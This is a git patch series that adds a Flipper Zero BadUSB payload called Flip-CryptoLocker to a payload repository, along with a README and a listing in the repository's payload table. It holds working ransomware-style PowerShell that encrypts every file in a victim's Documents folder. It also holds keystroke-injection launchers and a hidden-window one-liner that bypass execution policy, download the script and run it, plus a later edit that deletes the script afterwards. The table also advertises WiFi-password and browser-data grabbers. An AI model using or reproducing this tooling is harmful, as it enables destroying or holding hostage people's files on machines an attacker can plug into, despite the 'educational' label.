From 267cfe3fb357b6e53e6caf426a1a5015aa5c3fb0 Mon Sep 17 00:00:00 2001
From: ooovenenoso <120500656+ooovenenoso@users.noreply.github.com>
Date: Tue, 31 Oct 2023 10:52:31 -0400
Subject: [PATCH 1/7] Add files via upload
---
.../Flip-CryptoLocker/Flip-CryptoLocker.ps1 | 37 +++++++++++++++++++
.../Flip-CryptoLocker/Flip-CryptoUnlocker.ps1 | 37 +++++++++++++++++++
2 files changed, 74 insertions(+)
create mode 100644 Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1
create mode 100644 Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.ps1
diff --git a/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1 b/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1
new file mode 100644
index 0000000..602d2c5
--- /dev/null
+++ b/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1
@@ -0,0 +1,37 @@
+# Flip-CryptoLocker.ps1
+
+function Encrypt-File {
+ param (
+ [Parameter(Mandatory=$true)]
+ [string]$Path,
+
+ [Parameter(Mandatory=$true)]
+ [string]$Password
+ )
+
+ $AES = New-Object System.Security.Cryptography.AesCryptoServiceProvider
+ $AES.IV = New-Object byte[]($AES.IV.Length)
+ $AES.Key = [System.Text.Encoding]::UTF8.GetBytes($Password.PadRight($AES.Key.Length, '0'))
+
+ $Content = Get-Content -Path $Path -Encoding Byte
+ $EncryptedContent = $AES.CreateEncryptor().TransformFinalBlock($Content, 0, $Content.Length)
+
+ Set-Content -Path $Path -Value $EncryptedContent -Encoding Byte
+}
+
+# Fixed password for encryption (this is only for demonstration purposes, in a real scenario, you would want to generate or receive a password securely)
+$Password = "D3m0P@ssw0rd"
+
+# Detect the user's documents folder
+$DocumentsFolder = [Environment]::GetFolderPath("MyDocuments")
+
+# Get all the files in the documents folder
+$Files = Get-ChildItem -Path $DocumentsFolder -File
+
+# Encrypt each file
+foreach ($File in $Files) {
+ Encrypt-File -Path $File.FullName -Password $Password
+ Write-Host "File encrypted: $($File.Name)"
+}
+
+Write-Host "All files in the documents folder have been encrypted!"
diff --git a/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.ps1 b/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.ps1
new file mode 100644
index 0000000..d062239
--- /dev/null
+++ b/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.ps1
@@ -0,0 +1,37 @@
+# Flip-CryptoUnlocker.ps1
+
+function Decrypt-File {
+ param (
+ [Parameter(Mandatory=$true)]
+ [string]$Path,
+
+ [Parameter(Mandatory=$true)]
+ [string]$Password
+ )
+
+ $AES = New-Object System.Security.Cryptography.AesCryptoServiceProvider
+ $AES.IV = New-Object byte[]($AES.IV.Length)
+ $AES.Key = [System.Text.Encoding]::UTF8.GetBytes($Password.PadRight($AES.Key.Length, '0'))
+
+ $EncryptedContent = Get-Content -Path $Path -Encoding Byte
+ $DecryptedContent = $AES.CreateDecryptor().TransformFinalBlock($EncryptedContent, 0, $EncryptedContent.Length)
+
+ Set-Content -Path $Path -Value $DecryptedContent -Encoding Byte
+}
+
+# Fixed password for decryption (it should be the same one used for encryption)
+$Password = "D3m0P@ssw0rd"
+
+# Detect the user's documents folder
+$DocumentsFolder = [Environment]::GetFolderPath("MyDocuments")
+
+# Get all the files in the documents folder
+$Files = Get-ChildItem -Path $DocumentsFolder -File
+
+# Decrypt each file
+foreach ($File in $Files) {
+ Decrypt-File -Path $File.FullName -Password $Password
+ Write-Host "File decrypted: $($File.Name)"
+}
+
+Write-Host "All files in the documents folder have been decrypted!"
From 1a5d7e9d3870a2e0e730232fa836599d3c2588b8 Mon Sep 17 00:00:00 2001
From: ooovenenoso <120500656+ooovenenoso@users.noreply.github.com>
Date: Tue, 31 Oct 2023 11:07:55 -0400
Subject: [PATCH 2/7] Add files via upload
---
Payloads/Flip-CryptoLocker/Flip-CryptoLocker.txt | 13 +++++++++++++
Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.txt | 13 +++++++++++++
2 files changed, 26 insertions(+)
create mode 100644 Payloads/Flip-CryptoLocker/Flip-CryptoLocker.txt
create mode 100644 Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.txt
diff --git a/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.txt b/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.txt
new file mode 100644
index 0000000..e879fd6
--- /dev/null
+++ b/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.txt
@@ -0,0 +1,13 @@
+REM Flip-CryptoLocker Launcher
+REM Author: ooovenenoso
+DELAY 2000
+GUI x
+DELAY 2000
+STRING a
+DELAY 2000
+LEFTARROW
+DELAY 2000
+ENTER
+DELAY 4000
+STRING Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1' -OutFile "$env:USERPROFILE\Desktop\Flip-CryptoLocker.ps1"; & "$env:USERPROFILE\Desktop\Flip-CryptoLocker.ps1"
+ENTER
diff --git a/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.txt b/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.txt
new file mode 100644
index 0000000..cbf5a5d
--- /dev/null
+++ b/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.txt
@@ -0,0 +1,13 @@
+REM Flip-CryptoUnlocker Launcher
+REM Author: ooovenenoso
+DELAY 2000
+GUI x
+DELAY 2000
+STRING a
+DELAY 2000
+LEFTARROW
+DELAY 2000
+ENTER
+DELAY 4000
+STRING Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.ps1' -OutFile "$env:USERPROFILE\Desktop\Flip-CryptoUnlocker.ps1"; & "$env:USERPROFILE\Desktop\Flip-CryptoUnlocker.ps1"
+ENTER
From 449ee43788c239656f1ef7c0992419fc6450bc4d Mon Sep 17 00:00:00 2001
From: ooovenenoso <120500656+ooovenenoso@users.noreply.github.com>
Date: Tue, 31 Oct 2023 11:23:03 -0400
Subject: [PATCH 3/7] Create README.md
---
Payloads/Flip-CryptoLocker/README.md | 118 +++++++++++++++++++++++++++
1 file changed, 118 insertions(+)
create mode 100644 Payloads/Flip-CryptoLocker/README.md
diff --git a/Payloads/Flip-CryptoLocker/README.md b/Payloads/Flip-CryptoLocker/README.md
new file mode 100644
index 0000000..d1bb73e
--- /dev/null
+++ b/Payloads/Flip-CryptoLocker/README.md
@@ -0,0 +1,118 @@
+
+
+
+
+
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Flip-CryptoLocker and Unlocker
+
+Scripts designed for educational purposes to encrypt and decrypt files on a target machine.
+
+## Description
+
+The `Flip-CryptoLocker` script encrypts files on the user's machine while the `Flip-CryptoUnlocker` decrypts them. These scripts are designed purely for educational and demonstration purposes.
+
+## Getting Started
+
+### Dependencies
+
+* An internet connection
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload
+```
+powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1' -O "$D\locker.ps1"; & "$D\locker.ps1"
+```
+
+(back to top)
+
+## Contributing
+
+ooovenenoso
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+📱 My Socials 📱
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
+
+
+ 
+
From f422168955c66ee1bd897ba513b8603c9a727f98 Mon Sep 17 00:00:00 2001
From: ooovenenoso <120500656+ooovenenoso@users.noreply.github.com>
Date: Tue, 31 Oct 2023 11:26:54 -0400
Subject: [PATCH 4/7] Update README.md
---
README.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/README.md b/README.md
index 875c729..7000ec3 100644
--- a/README.md
+++ b/README.md
@@ -77,6 +77,7 @@ This, in turn, makes it so the user no longer needs to host their own version of
| [Wifi Grabber](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-WifiGrabber)| Grabs your target's WiFi passwords and uploads them to either Dropbox, Discord, or both. |✅ | Jakoby |
| [IP Grabber](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-IP-Grabber) | Grabs your target's IP addresses and uploads them to either Dropbox, Discord, or both. |✅ | Jakoby |
| [Browser Data](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-BrowserData)| This payload can be used to retrieve the browsing history and bookmarks of your target. |✅ | Jakoby |
+| [CryptoLocker](https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1) | A script designed for educational purposes to encrypt files on a target machine. |✅ | ooovenenoso |
## Contact
From 4573529490b96067fa66c85fdf39aaf6b2fb2e61 Mon Sep 17 00:00:00 2001
From: ooovenenoso <120500656+ooovenenoso@users.noreply.github.com>
Date: Tue, 31 Oct 2023 11:37:00 -0400
Subject: [PATCH 5/7] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 7000ec3..5092642 100644
--- a/README.md
+++ b/README.md
@@ -77,7 +77,7 @@ This, in turn, makes it so the user no longer needs to host their own version of
| [Wifi Grabber](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-WifiGrabber)| Grabs your target's WiFi passwords and uploads them to either Dropbox, Discord, or both. |✅ | Jakoby |
| [IP Grabber](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-IP-Grabber) | Grabs your target's IP addresses and uploads them to either Dropbox, Discord, or both. |✅ | Jakoby |
| [Browser Data](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-BrowserData)| This payload can be used to retrieve the browsing history and bookmarks of your target. |✅ | Jakoby |
-| [CryptoLocker](https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1) | A script designed for educational purposes to encrypt files on a target machine. |✅ | ooovenenoso |
+| [CryptoLocker](https://github.com/ooovenenoso/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-CryptoLocker) | A script designed for educational purposes to encrypt files on a target machine. |✅ | ooovenenoso |
## Contact
From 8d313524dab1416de8d0853a9d7960d6c388960e Mon Sep 17 00:00:00 2001
From: ooovenenoso <120500656+ooovenenoso@users.noreply.github.com>
Date: Tue, 31 Oct 2023 11:50:12 -0400
Subject: [PATCH 6/7] Update Flip-CryptoLocker.txt
Modified Flip-CryptoLocker to automatically delete after execution
---
Payloads/Flip-CryptoLocker/Flip-CryptoLocker.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.txt b/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.txt
index e879fd6..e7686d6 100644
--- a/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.txt
+++ b/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.txt
@@ -9,5 +9,5 @@ LEFTARROW
DELAY 2000
ENTER
DELAY 4000
-STRING Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1' -OutFile "$env:USERPROFILE\Desktop\Flip-CryptoLocker.ps1"; & "$env:USERPROFILE\Desktop\Flip-CryptoLocker.ps1"
+STRING Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1' -OutFile "$env:USERPROFILE\Desktop\Flip-CryptoLocker.ps1"; & "$env:USERPROFILE\Desktop\Flip-CryptoLocker.ps1"; Remove-Item "$env:USERPROFILE\Desktop\Flip-CryptoLocker.ps1" -Force
ENTER
From 54c1f90fdb210f45bd9f83d29c5e5bc4b5761c41 Mon Sep 17 00:00:00 2001
From: ooovenenoso <120500656+ooovenenoso@users.noreply.github.com>
Date: Tue, 31 Oct 2023 11:50:37 -0400
Subject: [PATCH 7/7] Update Flip-CryptoUnlocker.txt
Modified Flip-CryptoUnlocker to automatically delete after execution
---
Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.txt b/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.txt
index cbf5a5d..47a901f 100644
--- a/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.txt
+++ b/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.txt
@@ -9,5 +9,5 @@ LEFTARROW
DELAY 2000
ENTER
DELAY 4000
-STRING Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.ps1' -OutFile "$env:USERPROFILE\Desktop\Flip-CryptoUnlocker.ps1"; & "$env:USERPROFILE\Desktop\Flip-CryptoUnlocker.ps1"
+STRING Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.ps1' -OutFile "$env:USERPROFILE\Desktop\Flip-CryptoUnlocker.ps1"; & "$env:USERPROFILE\Desktop\Flip-CryptoUnlocker.ps1"; Remove-Item "$env:USERPROFILE\Desktop\Flip-CryptoUnlocker.ps1" -Force
ENTER
+
+ 
+
+ 
+
+ 
+
+ 
+
+